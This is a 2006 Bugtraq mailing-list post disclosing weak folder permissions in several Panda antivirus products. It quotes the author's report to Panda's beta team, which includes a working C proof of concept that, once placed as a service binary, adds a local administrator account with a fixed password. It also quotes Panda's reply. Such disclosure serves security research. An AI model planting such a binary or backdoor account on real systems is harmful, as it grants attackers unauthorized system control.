Re: SECURITY.NNOV: Panda Platinum Internet Security privilege escalation / bayesian filter control security vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: SECURITY.NNOV: Panda Platinum Internet Security privilege escalation / bayesian filter control security vulnerabilities
From: lolfischer@xxxxxxxxx
Date: 13 Sep 2006 16:34:24 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Panda is realy great and realy fast. The Bug was also reported at 16.07.06 to 
the beta team.




-------------------- 16.07.06 --------------------

Hi there,

i think there are some badly set filesystem permissions in your software.

FileSecure 7.01.10
C:\Programme\Panda Software\AVNT everybody full access

Titanium 2006 (5.03.00)
C:\Programme\Panda Software\ everybody full access

AntiVirus 2007 (2.00.80)
C:\Programme\Panda Software\ everybody full access

Platinum Internet Security 2006 (10.02.00)
C:\Programme\Panda Software\ everybody full access


it is possible to place a binary in the directory and let it execute at startup
as an service with system privs.

example for AntiVirus 2007 (2.00.80):

build it an place it in "C:\Programme\Panda Software\Panda Antivirus 2007"
for english Windows Version Porgram Files or somethin like this.


// --- pavsrv50.c ---
#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", 
szWinDir );

system( szCmdLine );

printf( "Adding user \"owner\" to the local Administrators group...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner 
/add", szWinDir );

system( szCmdLine );

return 0;
}
// --- pavsrv50.c ---


sorry for my bad english :)

testit on german windows xp sp2 all hotfixes and german windows 2k sp4 all 
hotfixes


btw. check the " if you install services

--------------------------------------------------


BTW: FileSecure 8.00.20 has the same vulnarability

I think the best solution is to change the AV Produkt.


Panda answer:
----------------- 21.07.06 -----------------------
Dear beta-tester,

Thank you very much for joining our beta program and reporting your tests so 
far. 

We comment you that "Panda Antivirus + Firewall 2007" and "Panda Internet 
Security 2007" have a Shield to protect its processes and files.

All incidents and comments received will help us to build a better product.

Please, do not doubt to report us any other incident or query that you may have.

Best regards,

Beta Area
Quality Assurance Division
mailto:beta@xxxxxxxxxxxxxxxxx

Panda Software
Protection against viruses, spyware, hackers, spam and other Internet threats
Buenos Aires, 12
48001 BILBAO - SPAIN 

--------------------------------------------------

Prev by Date: [eVuln] CJ Tag Board XSS Vulnerability
Next by Date: [eVuln] NX5Linkx Multiple Vulnerabilities
Previous by thread: SECURITY.NNOV: Panda Platinum Internet Security privilege escalation / bayesian filter control security vulnerabilities
Next by thread: PHPFusion <= 6.01.4 extract()/_SERVER[REMOTE_ADDR] sql injection exploit
Index(es):
- Date
- Thread